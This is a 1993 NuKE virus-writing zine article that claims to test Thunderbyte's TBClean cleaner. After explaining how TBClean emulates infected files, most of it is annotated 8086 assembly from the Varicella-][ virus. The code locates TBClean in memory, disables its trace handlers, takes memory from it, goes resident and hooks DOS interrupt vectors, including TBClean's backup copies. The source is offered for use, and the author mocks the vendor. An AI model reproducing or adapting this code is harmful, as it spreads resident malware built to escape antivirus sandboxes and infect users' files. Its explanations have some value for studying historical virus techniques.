+          NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE
+          uK                                                       E-
+          E-   "The Dangers of Thunderbyte's TBClean Emulation     Nu
+          Nu                     Techniques"                       KE
+          KE                                                       -N
+          -N                         By                            uK
+          uK                     Rock Steady                       E-
+          E-                                                       Nu
+          E-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-Nu
+
+NuKE InfoJournal #7
+August 1993
+
+
+% AntiVirus Spotlight of the Issue - Thunderbyte Anti-Virus v6.04 %
+
+% DISCLAIMER %
+
+This article is concerning a study and field test of the reliability of
+Thunderbyte's anti-virus package. The study was conducted by Rock Steady,
+and this is simply a report about his extensive study of Thunderbyte's
+TBClean utility. This report is not intended to scare people away from
+Thunderbyte's anti-virus package, but rather to show you how TBClean
+actually works in order to clean a virus. The information here may disturb
+many people, nevertheless it is presented here for the safety of those who
+use Thunderbyte's TBClean in a home and/or business environment.
+
+
+% What is ThunderByte %
+
+Thunderbyte is an anti-virus package, sometimes known as TBAV for ThunderByte
+Anti-Virus. TBAV tries to use fairly new techniques to try to detect and clean
+computer viruses. In this issue of the NuKE InfoJournal, we will take a
+very close look at the structure of TBAV, mainly the utility TBCLEAN.EXE
+which is supplied in every TBAV package.
+
+TBCLEAN.EXE is a program that tries to remove viruses from your infected
+files by using an heuristic/emulation approach. Now, for those who don't
+understand what an heuristic/emulation approach is let me try to explain
+it to you in more simplified, less-technical terms.
+
+TBClean will try to set up a "control" environment to execute the virus. You
+see, many of the computer viruses today will attach themselves to binary files
+and alter them in such a way that when you try to execute (run) the binary
+file the virus will execute first and install itself into memory, and then
+the virus will execute the original binary file it is attached to. Now, every
+????????.COM and ????????.EXE binary file contains an entry point. This is the
+point from which DOS to starts to execute the code. Basically it is
+the beginning of the program, and in order for the file to run properly we
+need to start at that entry point. Now *.COM files contain a FIXED entry point
+which is location 100h. Now if we attach a virus to the end of the COM file,
+we have to fix the entry point so that when executed the virus will run
+first. Since this is a FIXED entry point, we will go to location 100h, and
+put a JMP statement to jump to the entry point of the virus. For the
+original file to execute correctly, we will need the original three bytes
+at the entry point, since the JMP we put for it to jump to the virus entry
+point took three bytes of data in the .COM. So when the virus gives control
+back to the file, we then must restore the original three bytes and execute
+them.
+
+Now to remove the virus from the .COM file we need to know where the original
+three bytes are. So TBClean will actually execute the virus and try to catch
+the virus restoring the original three bytes. Once that happens, TBClean can
+safely remove the virus from the file, as it now can replace the original
+three bytes where the virus put its jump statement.
+
+Now .EXEs have a variable entry point, rather than a fixed one like the .COM
+files.  Each .EXE file contains a header of about 32 bytes in the beginning
+of the file which has information about the .EXE itself, including the entry
+point. Now when a virus attaches (infects) itself to an .EXE file, it simply
+puts its entry point inside the .EXE header and saves the original one for
+later use.
+
+Again, in order to remove a file from an .EXE file, we will need to have the
+original entry point location. And TBClean does this by executing the virus
+in a controlled environment; when the virus restores control back to the
+.EXE file, it will jump to the entry point location. TBClean will halt
+at that point and attempt to clean the file.
+
+
+% The Problem %
+
+The problem when doing this, the virus can always escape from this controlled
+environment and go loose. In fact we at NuKE have attempted and succeeded in
+doing just that!
+
+
+% Explanation %
+
+When you run TBClean to disinfect a virus-infected file, it does several
+things in order to set up the environment needed to execute the virus. One of
+things that TBClean does is check to see if it is being debugged.
+
+I guess the makers of TBClean did not want people to "debug" their software
+in order to have a closer look because once you know how the program works
+you then can attempt to bypass it. The easiest way to bypass the anti-debug
+traps is to use a debugger package that can go TSR and put loose breakpoints.
+I've found that Periscope and SoftIce can easily bypass the TBClean traps,
+or you may set a TSR file and set it to go off on the first interrupt 21h,
+function 3Dh (DOS Open File).
+
+The next main trick TBClean does is that it occupies all of the remaining
+memory left in the system. TBClean only requires about 20k for itself, but
+nevertheless it will occupy all the remaining memory left in the system. It
+will use this memory for the file it will attempt to clean, but not all of the
+memory is really needed, nevertheless it is occupied. Why? Well, because
+TBClean wants to set-up a secure environment to run the virus and by occupying
+all the available memory if the virus gets out of hand it CAN'T go resident
+because there is no more memory left! "Pretty smart," you must be saying to
+yourself? Yes, it is a good idea to occupy all of the memory, so like even if
+the virus tries to allocate memory it will get an error and it will quit.
+
+The next trick, before TBClean actually executes the virus in the controlled
+environment is that it will make two copies of the interrupt vector table.
+This too is a good idea, because if a virus does manage to escape and hook the
+vector table, TBClean will notice the vector table change and restore it
+with the original value. Therefore, if a virus was to "get out" of this
+controlled TBClean environment we would need to hook all three copies of the
+vector tables (DOS + the two copies that TBClean makes).
+
+After this, we are pretty much ready to try to make a disinfection via
+emulation. Of course TBClean turns on the Trap flag, and uses Int 0h, 1h, 3h,
+and 4h to do the actual tracing. The interrupt that we REALLY need to pay
+attention to is Int 1h. Why? Well, when Intel built the first 80x86 (the 8086)
+they added what we call a Trap Flag. Normally this flag is off, and the
+processor executes every line of code without stoping. But when the trap flag
+is on, the processor will issue an Int 1h call after every line of code
+executed. Therefore, after every line of code is executed the processor will
+issue an Int 1h, which TBClean quietly awaits -- then it can actually analyze
+the code line by line.
+
+There are a few restrictions that TBClean enforces; one of them is the Trap
+flag must always be on! If you try to turn off the Trap flag, TBClean will
+fool the virus into thinking the Trap flag is off, but it really stays on.
+Secondly, interrupt calls are not allowed. Thirdly, it will never give you
+the true vector address of Int 1h or Int 3h -- it gives you a fake value
+instead. Finally, TBClean will NOT allow the virus to have its segment in
+the DS or ES registers, meaning that if TBClean resided in location 0ABC:0000,
+the value 0ABC is never allowed to go in the DS or ES registers of the virus.
+This is done so the virus is not able to snoop inside TBClean.
+
+
+% Making a virus to bypass TBClean %
+
+After I had successfully taken apart TBClean, and once I understood exactly
+how it worked, then I was ready to write a virus to defeat TBClean's
+dangerous emulation techniques.
+
+Don't get me wrong, TBClean has a great idea going, but it contains too many
+flaws that must be tightened up. And apparently those flaws can lead to the
+destruction of your PC. Just think about it. Let's say you just downloaded a
+file from your local BBS, and you used TBSCAN to scan the new file for viruses,
+before you attempt to execute it. Lets say the file is infected with a virus
+like Varicella-][, which can bypass TBClean. Now if TBSCAN reported a virus,
+wouldn't you naturally try to clean it so you could perhaps use the file? Of
+course you would, and what program would you use to do the job? Nothing but
+TBClean!
+
+Picture it, your computer is not infected by any virus, you are pretty much
+happy about yourself for using TBSCAN and detecting that virus inside that
+file you just downloaded. Your glad you got it before it infected your
+computer. Or lets say you got TBScanX resident, and it caught the virus, just
+as you attempt to executed it... You now try to clean the file with TBClean.
+TBClean does what it has to do, looks at the file and then tries emulation to
+disinfect it. After emulation TBClean reports no viruses found, and tells you
+that it may not even be infected with a virus.
+
+You're puzzled? Well, actually TBClean just unleased the virus into your
+system! Now who's to blame? Personally, I think it's the incompetent
+programmers of TBClean. It allowed too many loopholes in their program, and
+the Varicella-][ virus just took advantage of those loopholes and is now
+resident in your computer, ready to infect every file you touch. Remember, it
+is also a very fast, stealthy virus.
+
+Personally, if _any_ anti-virus program should attempt to disinfect via
+emulation, it must be EXTREMELY cautious, and it should take every
+possible loophole into account. Remember, emulation means that you are
+actually executing the virus in order to disinfect it. Many people didn't
+know that, but TBClean executes (RUNS) the virus! How Satanic! Thunderbyte
+should praise NuKE for testing their software and showing them their flaws, so
+that they may do whatever is necessary to fix this problem.
+
+It is fortunate for Thunderbyte that no "evil" virus writer has noticed
+this problem and took advantage of it. It would have cost Thunderbyte
+their name and market share.
+
+Anyhow, enough with Thunderbyte, this package has enough flaws. It is sad
+that Thunderbyte rated very low under NuKE's personal attack tests in several
+fields.
+
+Thunderbyte reported too many false positives, meaning it screamed *VIRUS*
+when no virus was present. It is enough that the average computer user is
+paranoid about viruses, but if you "cry wolf" too many times people lose hope
+in the package.
+
+Thunderbyte was incapable of working in a DOS Window shell, in SCO Unix, and
+under OS/2. This seems to be because TBSCAN uses its own file routines, instead
+of DOS's.
+
+Thunderbyte is also not very user friendly -- 4 out of 5 moms found this
+package too difficult to use. A Windows version of Thunderbyte could
+be a great plus.
+
+
+% And in this corner...Varicella-][ %
+
+Let's go into detail with parts of the Varicella-][ virus and let's show you why
+it works.
+
+     1          mov     byte ptr cs:[tb_here][bp],00h   ;Reset TB flag
+     2          xor     dx,dx                           ;dx=0
+     3          mov     ds,dx                           ;ds=0
+     4          mov     ax,word ptr ds:[0006h]          ;ax=0000:0006 segment of
+     5          dec     ax
+     6          mov     ds,ax
+
+Okay, after looking at the above we begin by resetting our TB flag. TBClean
+will not give us the complete address of Int 1h. It will only give us the
+correct segment, the offset is no good. Therefore let's simply take the segment.
+Now we know the segment location of TBClean in memory, since TBClean will
+not let me store the value in DS, let's subtract 1 and *then* store it in DS.
+We have again fooled TBClean; maybe we can't have TBClean's correct segment
+in DS, but by subtracting 1 and adding 16 to IP, we get the exact location.
+
+In the next block of code, we will search 64k of TBClean's memory in order to
+find the Int 1h and 3h offsets and the two copies of the vector table. This is
+the bit of data we will be searching for.
+
+====================Somewhere in TBClean.EXE==v6.04===================
+ 1 cs:04A4  33C0                xor     ax,ax
+ 2 cs:04A6  8ED8                mov     ds,ax
+ 3 cs:04A8  8BF8                mov     si,ax
+ 4 cs:04AA  BF342D              mov     di,2D34
+ 5 cs:04AD  B90002              mov     cx,0200
+ 6 cs:04B0  F3A5                rep movsw
+
+[The above block is coping the vector table (0000:0000) to location
+ ES:DI (ES:2D34). This value we will need.]
+
+ 7 cs:04B2  FA                  cli
+ 8 cs:04B3  C70600005411        mov     word ptr [0000],1154
+ 9 cs:04B9  8C0E0200            mov     [0002],cs
+10 cs:04BD  C7060400E513        mov     word ptr [0004],13E5
+11 cs:04C3  8C0E0600            mov     [0006],cs
+12 cs:04C7  C7060C006B15        mov     word ptr [000C],156B
+13 cs:04CD  8C0E0E00            mov     [000E],cs
+14 cs:04D1  C70610005411        mov     word ptr [0010],1154
+15 cs:04D7  8C0E1200            mov     [0012],cs
+16 cs:04DB  C70614005411        mov     word ptr [0014],1154
+17 cs:04E1  8C0E1600            mov     [0016],cs
+18 cs:04E5  C70618005411        mov     word ptr [0018],1154
+19 cs:04EB  8C0E1A00            mov     [001A],cs
+20 cs:04EF  C7066C002411        mov     word ptr [006C],1124
+21 cs:04F5  8C0E6E00            mov     [006E],cs
+22 cs:04F9  FB                  sti
+
+[The above block is hooking the vector table. This is were we get our
+ Int 1h and 3h location.]
+
+23 cs:04FA  8BF0                mov     si,ax
+24 cs:04FC  8BF8                mov     di,ax
+25 cs:04FE  2E8E06F032          mov     es,cs:[32F0]
+26 cs:0503  B90080              mov     cx,8000
+27 cs:0506  F3A5                rep movsw
+
+[The above block copies 8000 bytes (vector table, CMOS, BIOS, etc.) into
+ the segment which is in location CS:32F0. We will need to get this
+ location to hook the interrupts.]
+===========================END of TBClean=============================
+
+Now, the bellow block will start to search for the above block in memory
+where we will scan 64k from the segment we got.
+
+                mov     cx,0FFFFh                       ;cx=64k
+                mov     si,dx                           ;si=0
+
+look_4_TBClean: mov     ax,word ptr ds:[si]
+                xor     ax,0A5F3h
+
+[You could do a "CMP   WORD PTR DS:[SI],0A5F3h", I just wanted to be sneaky
+ because TBClean will find out what I'm doing and fool around with the
+ flag and my test will fail! As you can see, we are looking for the bytes
+ from line #6. We search by REVERSE-BIT format! To find F3A5 we search with
+ A5F3.]
+                je      check_it                        ;jmp if its TBClean
+look_again:     inc     si                              ;if not continue looking
+                loop    look_4_TBClean
+                jmp     not_found                       ;not found cont normal
+
+[If A5F3 is found, we continue with the bottom, which will search for more bytes
+ in that block captured above. These bytes that we are searching for exist
+ in all version of TBClean v6.00-6.04. I haven't test bellow v6.00, but it
+ should work!]
+
+check_it:       mov     ax,word ptr ds:[si+4]
+                xor     ax,0006h
+                jne     look_again                      ;jmp =! TBClean
+                mov     ax,word ptr ds:[si+10]
+                xor     ax,020Eh
+                jne     look_again                      ;jmp =! TBClean
+                mov     ax,word ptr ds:[si+12]
+                xor     ax,0C700h
+                jne     look_again                      ;jmp =! TBClean
+                mov     ax,word ptr ds:[si+14]
+                xor     ax,0406h
+                jne     look_again                      ;jmp =! TBClean
+
+[If all the bytes match, it means we found TBClean in memory, and since we
+ know where we are, we can steal the Int 1h & 3h locations, like we do
+ bellow.]
+                mov     bx,word ptr ds:[si+17]          ;steal REAL int 1 offset
+
+[Now that we have the offset of Int 1h in BX, replace the first byte at Int 1h
+ handler with CF (IRET), making the handler Useless! NOTE: we are adding 16 to
+ the offset because the segment is really DS - 1, so to counter act the segment
+ we add 16 to the offset. (16 bytes = 1 segment)]
+
+                mov     byte ptr ds:[bx+16],0CFh        ;replace with IRET
+
+[Same is done for Int 3h bellow.]
+
+                mov     bx,word ptr ds:[si+27]          ;steal REAL int 3 offset
+                mov     byte ptr ds:[bx+16],0CFh        ;replace with IRET
+
+[TBClean is OFFICIALLY DEAD! Congrats, now lets turn on the flag, cause we
+ found TBClean, and let's go resident]
+
+                mov     byte ptr cs:[tb_here][bp],01h   ;set the TB flag on
+
+[The next block gets the segment of where the 2nd copy of the vector table
+ is hiding (line #25 in TBClean capture)!]
+
+                mov     bx,word ptr ds:[si+51h]         ;get 2nd segment of ints
+                mov     word ptr cs:[tb_int2][bp],bx    ;vector table
+
+[The next block gets the offset of the 1st copy of the vector table that
+ TBClean did (line #4 in TBClean capture).]
+
+                mov     bx,word ptr ds:[si-5]           ;get offset of 1st copy
+                mov     word ptr cs:[tb_ints][bp],bx    ;of vector table
+
+[Now we can get the real Int 21h, 13h,and 1Ch locations from the vector table.]
+
+not_found:      xor     dx,dx
+                push    ds
+                mov     ds,dx                           ;put that in ds
+                les     si,dword ptr ds:[0084h]         ;get int21 vector
+                mov     word ptr cs:[int21][bp],si      ;save int21 offset
+                mov     word ptr cs:[int21+2][bp],es    ;save int21 segment
+
+                les     si,dword ptr ds:[0070h]         ;get int1c vector
+                mov     word ptr cs:[int1c][bp],si      ;save int1c offset
+                mov     word ptr cs:[int1c+2][bp],es    ;save int1c segment
+
+                les     si,dword ptr ds:[004ch]         ;get int13 vector
+                mov     word ptr cs:[int13][bp],si      ;save int13 offset
+                mov     word ptr cs:[int13+2][bp],es    ;save int13 segment
+                pop     ds
+
+                mov     byte ptr cs:[mcb][bp],00h       ;reset the TB mcb flag
+                mov     ax,0abcdh                       ;test if virus is here?
+                int     13h
+                cmp     bx,0abcdh                       ;is it?
+                jne     install_virus                   ;jmp, if not & install
+leave_mcb:      jmp     exit_mem                        ;yes, leave then
+
+[This is the tricky part! Remember TBClean occupies ALL available memory!
+ So I had to come up with a routine that would work when TBClean was NOT in
+ memory, and when it was! The task was hard...but I did it (naturally, hehe).
+
+ TBClean *NOT* in memory: If TBClean is not in memory, then we start at location
+ "install_virus" and we get the List of Lists, and we get the FIRST MCB chain
+ and basically we chain through until we find the END of the MCB chain, which
+ ends with a "Z" instead of an "M". Once we find the last chain we subtract
+ the virus size in paragraphs, and that's it...
+
+ TBClean in memory: If TBClean is in memory when the virus finds the LAST
+ MCB block and tries to subtract its size from it, it will notice that
+ not enough memory is available. Where then will jump to "steal_some."
+
+ What "steal_some" does is it will REPEAT the process again. Meaning it will
+ now get the FIRST MCB chain, and chain through the end, but while its chaining
+ through the MCB, it will look for the MCB that belongs to TBClean!!! Once we
+ find the MCB that belongs to TBClean we will subtract the virus size in
+ paragraphs from it and voila -- we stole and allocated memory while bypassing
+ TBClean!!! And now we can safely return to TBClean without worrying if it will
+ de-allocate our memory space.]
+
+;--------- Going Resident ------
+
+steal_some:     mov     al,byte ptr cs:[mcb][bp]        ;if tb is here, steal
+                cmp     al,0ffh                         ;memory from it!
+                je      leave_mcb                       ;error? exit then
+                inc     byte ptr cs:[mcb][bp]           ;inc flag
+                cmp     al,01                           ;
+                ja      mcb3_1
+
+install_virus:  mov     ah,52h                          ;get the list of lists
+                int     21h                             ;use dos
+                mov     ax,es:[bx-2]                    ;get first mcb chain
+
+                mov     es,ax                           ;es=segment of 1st mcb
+mcb1:           cmp     byte ptr es:[0000h],'Z'         ;is it the last mcb
+                jne     mcb2                            ;jmp if not
+                clc                                     ;yes last mcb, CLC
+                jmp     short mcbx                      ;outta here
+
+mcb2:           cmp     byte ptr es:[0000h],'M'         ;is it in the chain
+                je      mcb3                            ;jmp if yes
+                stc                                     ;error, set carry flag
+                jmp     short mcbx                      ;outta here
+
+[The bellow block is special! Meaning if the TB flag is on, we will compare
+ ALL of the MCB block owners to find the one that belongs to TBClean! Since
+ we already know the segment of TBClean, we subtract 100h (256) bytes and we
+ have its PSP area. Since DS = segment - 1, we will do DS = segment - 9, since
+ we  already subtracted 1 from the beginning!]
+
+mcb3:           cmp     byte ptr cs:[mcb][bp],0         ;is TB flag off?
+                je      mcb3_1                          ;if yes, then jmp
+                mov     dx,ds                           ;else cmp TB ds
+                sub     dx,9h                           ;ds-10
+                cmp     word ptr es:[0001h],dx          ;cmp to mcb owner.
+                je      mcbx_1
+
+mcb3_1:         mov     ax,es                           ;ax=es
+                add     ax,word ptr es:[0003h]          ;ax=es + next mcb
+                inc     ax                              ;get mcb
+                mov     es,ax                           ;es=ax:next mcb chain
+                jmp     short mcb1                      ;goto first step
+
+mcbx:           jc      leave_mcb                       ;if error, exit
+mcbx_1:         cmp     word ptr es:[0003],(virus_size/16) + 11h
+                jb      steal_some
+                mov     byte ptr es:[0000],'Z'          ;the last mcb chain!
+                sub     word ptr es:[0003],(virus_size/16) + 11h
+                add     ax,word ptr es:[0003h]          ;figure out segment
+                inc     ax                              ;add 16 bytes
+                mov     es,ax                           ;new segment in es
+                mov     di,103h                         ;offset is 103h
+
+[Now we have some memory! Let's move a copy of the virus into that newly
+ allocated memory under the TOM!]
+
+                push    ds                              ;save TB ds location
+                push    cs
+                pop     ds                              ;virus cs=ds
+                mov     si,offset init_virus            ;si=top of virus
+                add     si,bp                           ;add delta
+                mov     cx,virus_size                   ;move virus_size
+                cld                                     ;clear direction flag
+                repne   movsb                           ;do it Mr. Crunge
+
+[Now we will hook the DOS Vector table (0000:0000->0000:0200).]
+
+                mov     ds,cx                           ;ds=0000
+hook_again:     cli                                     ;disable ints
+                mov     word ptr ds:[0084h],offset int21_handler     ;hook int21
+                mov     word ptr ds:[0086h],es
+                mov     word ptr ds:[0070h],offset int1c_handler     ;hook int1c
+                mov     word ptr ds:[0072h],es
+                mov     word ptr ds:[004ch],offset int13_handler     ;hook int13
+                mov     word ptr ds:[004eh],es
+                sti                                     ;enable ints
+
+[We will test if the TBClean flag is on! If TBClean flag is on, we will make
+ DS = "segment of 2nd copy of vector table in TCLEAN" and hook it!]
+
+                cmp     byte ptr cs:[tb_here][bp],00h   ;was TB found?
+                je      go_on                           ;no, then jmp
+                cmp     cl,01h                          ;is this the 2nd x here?
+                je      go_on                           ;yes, then jmp
+                mov     ds,word ptr cs:[tb_int2][bp]    ;get TB int segment
+                inc     cl                              ;inc cl
+                jmp     short hook_again                ;hook ints again
+
+[If TBClean was found the bellow block will now hook the last copy of the
+ vector table that TBClean did...]
+
+go_on:          pop     ds                              ;get TB code segment
+                cmp     byte ptr cs:[tb_here][bp],01h   ;TB here?
+                je      hook_tb_ints                    ;yes, then jmp
+                jmp     exit_mem                        ;else exit
+hook_tb_ints:   mov     si,word ptr cs:[tb_ints][bp]    ;get TB int offset
+                mov     word ptr ds:[si+84h+16],offset int21_handler
+                mov     word ptr ds:[si+86h+16],es
+                mov     word ptr ds:[si+70h+16],offset int1c_handler
+                mov     word ptr ds:[si+72h+16],es
+                mov     word ptr ds:[si+4ch+16],offset int13_handler
+                mov     word ptr ds:[si+4eh+16],es
+
+[ALL DONE!!! Now we restore to the original file!
+
+ So how does it feel to fool TBClean??? Article #11 contains the complete
+ source code of the Varicella-][ virus. You may test it as you wish!]
+
+exit_mem:       pop     ds
+                pop     es
+                pop     si
+                cmp     word ptr cs:[buffer][bp],5A4Dh  ;.exe file?
+                je      exit_exe_file                   ;yupe exit exe file
+                cmp     word ptr cs:[buffer][bp],4D5Ah  ;.exe file?
+                je      exit_exe_file                   ;yupe exit exe file
+                push    cs
+                pop     ds
+                mov     bx,offset buffer                ;get first 3 bytes
+                add     bx,bp                           ;fix delta
+                mov     ax,[bx]                         ;move first 2 bytes
+                mov     word ptr ds:[100h],ax           ;put em in the beginning
+                inc     bx                              ;inc pointer
+                inc     bx
+                mov     al,[bx]                         ;get last of 3rd byte
+                mov     byte ptr ds:[102h],al           ;put that in place
+                pop     dx
+                pop     cx
+                pop     bx
+                pop     word ptr cs:[ax_reg][bp]        ;save ax else where
+                mov     ax,100h
+                push    ax                              ;fake a CALL & RETN
+                mov     ax,word ptr cs:[ax_reg][bp]     ;put ax as normal
+                retn                                    ;link to 100h
+
+exit_exe_file:  mov     dx,ds                           ;get psp=ds seg
+                add     dx,10h                          ;add 16bytes to seg
+                pop     word ptr cs:[ax_reg][bp]
+                pop     cx
+                pop     bx
+                pop     ax
+                add     word ptr cs:[buffer+22][bp],dx  ;fix segments
+                add     dx,word ptr cs:[buffer+14][bp]
+                cli
+                mov     ss,dx                           ;restore ss
+                mov     sp,word ptr cs:[buffer+16][bp]  ;and sp
+                sti
+                mov     dx,word ptr cs:[ax_reg][bp]
+                jmp     dword ptr cs:[buffer+20][bp]    ;jmp to entry pt.
+
+                            Rock Steady/NuKE
+===============================================================================